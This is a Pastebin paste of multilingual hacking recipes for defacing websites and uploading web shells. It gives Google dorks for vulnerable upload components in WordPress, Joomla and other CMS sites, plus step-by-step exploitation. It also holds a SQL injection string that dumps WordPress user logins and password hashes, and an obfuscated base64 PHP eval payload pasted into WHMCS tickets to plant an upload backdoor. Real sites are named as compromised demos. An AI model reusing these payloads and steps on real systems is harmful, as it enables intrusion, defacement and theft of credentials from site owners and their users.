Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /ajaxfilemanager file uploader deface on txt/jpg not sure about html/
- Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
- For Example I got :
- http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/ - See more at: http://mxdotmy.blogspot.kr/2013/04/ajax-file-manager-shell-and-files.html#sthash.xj3zu2j0.dpuf
- or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
- or any site else ...
- Now Put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url
- for example :
- http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
- http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
- Now Find Upload Upload and Upload Your shell/Deface/file To view you File find /Uploaded/ directory in Website by using your brain :P example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt
- ------------------
- WordPress File Upload com Asset Manager
- Dork:inurl:Editor/assetmanager/assetmanager.asp
- --------------------
- Hack Blog/WordPress forma facil facil :D
- Dork: inurl:"fbconnect_action=myhome"
- 2. Agora, abra qualquer link abaixo.
- 3. Depois de abrir o link basta alterar essa parte da ?fbconnect_action=myhome&userid= com este aqui:
- ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
- ----------------------
- Hack sites usando RTE webwiz Vulnerabilidade
- Primeiro procure o Dork Dork para esta vulnerabilidade é "inurl:rte/my_documents/my_files"
- O Exploit é site.com/rte/RTE_popup_file_atch.asp
- site.com/admin/RTE_popup_file_atch.asp
- exemplo, eu encontrei um site que é vulnerável a RTE Site: http://www.billkonigsberg.com Vulnerabilidade http://www.billkonigsberg.com/RTE_popup_file_atch.asp Agora é so carregar a página deface no site, depois de carregar a sua página.
- Obs: Procure outra pagina pois está ja não está mais vulneravel
- --------------------------
- EzFilemanager Deface Upload
- Dork para EzFilemanager é "inurl:ezfilemanager/ezfilemanager.php"
- (Você pode modificar esse dork para obter mais resultados no google)
- Exploit: http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
- Ir para este URL: website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php e colocar ?sa=1&type=file depois da URL
- agora url será: http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
- Agora ver a opção de upload e você pode fazer o upload, html, pdf, ppt, txt, doc, rtf, xml, xsl, DTD, zip, rar, jpg, png
- ---------------------------
- Title : Wordpress Exploit Easy Comment Upload
- Dork : inurl:easy-comment-uploads/upload-form.php
- POC : /wp-content/plugins/easy-comment-uploads/upload-form.php
- 1. Pergi Google masukkan dork ke dalam Search dan Go.
- Dork : inurl:easy-comment-uploads/upload-form.php
- 2. Pilih target.
- 3. Ada butang choose file tu tekan dan upload file anda.
- 4. Tidak semua dapat support html/php/asp sebab bug ne sudah fix 12/09/2011.
- 5. Dapat target untuk upload html kira bertuahlah.
- Untuk lihat hasil file upload anda tambah /wp-content/uploads/2011/10/nama_file_anda.extension
- ---------------------------------
- JOOMLA COMPONENT COM_SMARTFORMER SHELL UPLOAD VULNERABILITY
- Assalamualaikum hari ini aku nak share exploit joomla lagi.Exploit ini korang bole upload shell.Ok jom mula.
- 1. Google dork :
- inurl:"index.php?option=com_smartformer"
- 2. Pilih salah satu target dah akan keluar contoh mcm dalam gambar di bawah :
- Isi maklumat macam dalam gambar.
- Lepas tu SUBMIT.
- Akan keluar lebih kurang macam gambar di bawah :
- Ok kalau keluar mcm ni mksudnya shell korang dah masuk.Tapi kalau tak keluar macam ni contoh nya dia tulis "File rejected","file contain virus", dll maksudnya korang tak boleh upload shell.
- 3. Untuk tengok hasil :
- http://target.com/components/com_smartformer/files/SHELL.php
- target.com = ganti dengan url website yg korang dapat SHELL.php tu ganti dengan nama shell korang.
- note : ada website yang bole upload tapi bila buka shell tulis not found.tu maksudnya website tu simpan shell tu di directory lain.korang kena cari explore seniri.
- SIAP!
- Live Demo :
- http://www.northendthrift.com/index.php?option=com_smartformer&Itemid=3
- Result :
- http://www.northendthrift.com/components/com_smartformer/files/hello.htm
- -------------------------------------------
- WordPress "photocrati-theme" Remote File Upload "RFU"
- As-salam salam sejahteranye pun aduii... ok hari ni ku nak ajar exploit wordpress sangat simple upload shell dah terus boleh hack ok jom mulakannya pun aduiii... Dork nya
- "inurl:wp-content/themes/photocrati-theme/admin" ok kembang2 kan la dork nya yach << indon -_- ok seterusnya korang akan jumpa website macam ini http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/gallery-iframe.php?gal_id=65_1&gal_type=1&gal_cap=OFF&gal_page=true&page_template=false&bg=42413F seterusnya korang cuma perlu ganti dengan upload_edit.php contohnya macam ini http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php maka akan terpapar tempat nak upload shell macam nie
- ok lepas 2 korang bolehlah upload shell berbentuk shell.php.jpg
- ramai tnya mana nak dapat shell.php.jpg ?? korang cuma perlu rename nama shell korang saje jadi shell.php.jpg
- dah korang upload tekan menekan add images
- ok dah selesai upload shell korang akan kuar di sini
- http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/shell.php.jpg
- contoh shell yang aku dah upload
- http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/taik.php.jpg
- ------------------------------
- Hack with WHM Submit ticket exploit
- Upload Script
- {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OE{php}eval(base64_decode('wyWnZjbTAgSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSSBQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSSBWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JIFBHSnlQaWM3SUgwTkNuME5DajggIik7ICR2ID0gYmFzZTY0X2RlY29kZSgiSkhZZ1BTQWtTRlJVVUY5RFQwOUxTVVZmVmtGU1Uxc2lkbWx6YVhSeklsMDdEUW9nYVdZb0lDUjJJRDA5SUNJaUtRMEtJSHNrZGlBOUlEQTdEUW9nSkhacGMybDBiM0lnUFNBa1gxTkZVbFpGVWxzaVVrVk5UMVJGWDBGRVJGSWlYVHNOQ2lBa2QyVmlJRDBnSkY5VFJWSldSVkpiSWtoVVZGQmZTRTlUVkNKZE93MEtJQ1JwYm1vZ1BTQWtYMU5GVWxaRlVsc2lVa1ZSVlVWVFZGOVZVa2tpWFRzTkNpQWtkR0Z5WjJWMElEMGdjbUYzZFhKc1pHVmpiMlJsS0NSM1pXSXVKR2x1YWlrN0RRb2dKR0p2WkhrZ1BTQWlVMmhsYkd3Z1YyaHRZM01nUkdrZ09pQWtkR0Z5WjJWMElHbHdJQ1IyYVhOcGRHOXlJanNnUUcxaGFXd29JbmRoYkdGb01UVTVRR2R0WVdsc0xtTnZiU0lzSWlBa2RHRnlaMlYwSWl3Z0lpUmliMlI1SWlrN0RRb2dmU0JsYkhObElIc05DaUFrZGpzTkNpQjlJSE5sZEdOdmIydHBaU2dpZG1semFYUnpJaXdrZGlrNyIpOyAkZm8gPSBmb3BlbigidGVtcGxhdGVzL3gucGhwIiwidyIpOyBmd3JpdGUoJGZvLCRjb2RlLCR2KTs=')) ;{/php}) <---- copy paste on description,title and also name for the email is your choice if paste doesnt work use fake or your alt email
- Dork
- 1. inurl:whmcs/cart.php?a=
- 2. inurl:billing/cart.php?a=
- intext:Powered by WHMCompleteSolution inurl:submitticket.php
- intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
- intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
- intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
- intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
- intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
- intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
- intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
- ------------------------------------------------
- Deface Website Dengan Spaw File Manager
- SPAW FILE MANAGER - FILE UPLOAD VULNERABILITY
- Jom Start!!
- 1. Masukkan salah satu Dork ini di Google search
- = inurl:Spaw2/dialogs/
- = Inurl:spaw2/uploads/files \
- = Index of:/Spaw2/uploads/files
- 2.Pilih satu website dan masukan exploit dihujung URL... dan tekan enter.
- Exploit :/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
- site/anydork/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
- ----------------------------------------
- xploit WordPress “/easy-comment-uploads/upload-form.php”
- —————————————————————————-
- | Title : WordPress Plugin EasyComment Upload Vulnerability
- | Author: Z190T
- | Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
- | Date : 15/06/2011
- | Dork : “/easy-comment-uploads/upload-form.php”
- | Category : PHP [File Upload Vulnerability]
- | Tested on: [Windows XP3, Linux Ubuntu]
- —————————————————————————-
- *_Exploit_*
- # http://[localhost]/[path]/easy-comment-uploads/upload-form.php
- # http://[localhost]/easy-comment-uploads/upload-form.php
- # File Extention [.txt],[.jpg],[gif],[png],[bmp]
- *_Preview_*
- # site/wp-content/uploads/[years]/[month]/[yourshell]
- # ex: site/wp-content/uploads/2011/06/shell.php;.txt
- =========================================================
- Demo langsung :
- http://www.conversationworks.ca/wp-content/uploads/2011/06/galau.jpg
- http://www.qastairs.com/wp/wp-content/uploads/2011/06/galau.jpg
- http://www.10000mile.com/main/wp-content/uploads/2011/06/galau.jpg
- -----------------------------------------------------------
- "Encodable" ~ another Deface and shell upload Vulnerablity
- Title : "Encodable" ~ another File upload Vulnerablity
- Google Dork : "intext:File Upload by Encodable"
- Lets Start .. xd
- open google.com and enter this dork : "intext:File Upload by Encodable"
- result comes with 166,000 results but some results are fake ... its may be malwaers
- so pick real things only , "Upload a file" You will this title in search results here :)
- click the sites sites only which comes with upload a file title
- after click the link you'll got a upload form
- you'll saw some options in this form like name Description email etc ...
- type anything in these boxes but add a email in email box, dont use your own
- put this one billy@microsoft.com , admin@nasa.gov etc :P
- now choose you file and upload it :)
- after clicking on upload button a pop up will be open ... dont close it, it will automatilcly closed
- after uploading file
- in some sites you'll got you uploaded file link after uploading on website
- and if you did not file it then try these url
- /upload/files/
- or /upload/userfiles/
- Live Demo : http://150.101.230.65:8008/cgi-bin/filechucker.plx
- Uploaded page : http://150.101.230.65:8008/upload/files/xd.html
- ---------------------------------------------------------------------------
- Uploading defaces pages JOOMLA
- http://mxdotmy.blogspot.kr/2013/04/cara-deface-dengan-teknik-exploit-joomla.html
- Thanks Indonesia Cyber Army lovaya
- ---------------------------------------------------------------------------
- As-salam korang semua harap2 baik2 saja dah lama x update blog nie ok hari ni ku nak ajar korang cara hack website dengan method CSRF ? apa 2 CSRF?? CSRF ialah cross site scripting haha betul x aku xtau ok jom mula :D dork : inurl:/plugins/simple-forum/
- /resources/jscript/ajaxupload/sf-uploader.php
- kt belakang contoh akan jadi cmni
- www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
- dia akan kuar tulisan = error
- kalau kuar acces denied x boleh la 2
- poc dia
- <form enctype="multipart/form-data" action="http://mamaklub.longtail.sk/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> upload poc dia dalam mana web save as.html lepas 2 tukar website yang ada tulisan error masuk kan dalam poc 2 bila bukak akan kuar form upload dan upload la shell shell korang akan kuar kt sini wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
- ----------------------
- Wp mini forum defaces and shells uploads
- inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
- site.com/wp-content/uploads/tdomf/tmp/1/ip address korang/shell.php.jpg
- --------------------------------
- Asset Manager :Shell and Files upload Vulnerability
- Google Dork : "inurl:Editor/assetmanager/assetmanager.asp"
- Open Google.com/ncr and enetr this dork
- "inurl:Editor/assetmanager/assetmanager.asp"
- Now Open any site from search results
- Upload File:
- and site url will be like site.com/Editor/assetmanager/assetmanager.asp
- Change The Flash into all Files and Now choose Your File and Upload
- and acess Your file here site.com/Editor/assets/yourfilehere
- -------------------------
- Xampp/lang.tmp Exploit
- inurl:"xampp/lang.tmp"
- /xampp/lang.tmp change to /xampp/lang.php?MESSAGE HERE
Add Comment
Please, Sign In to add comment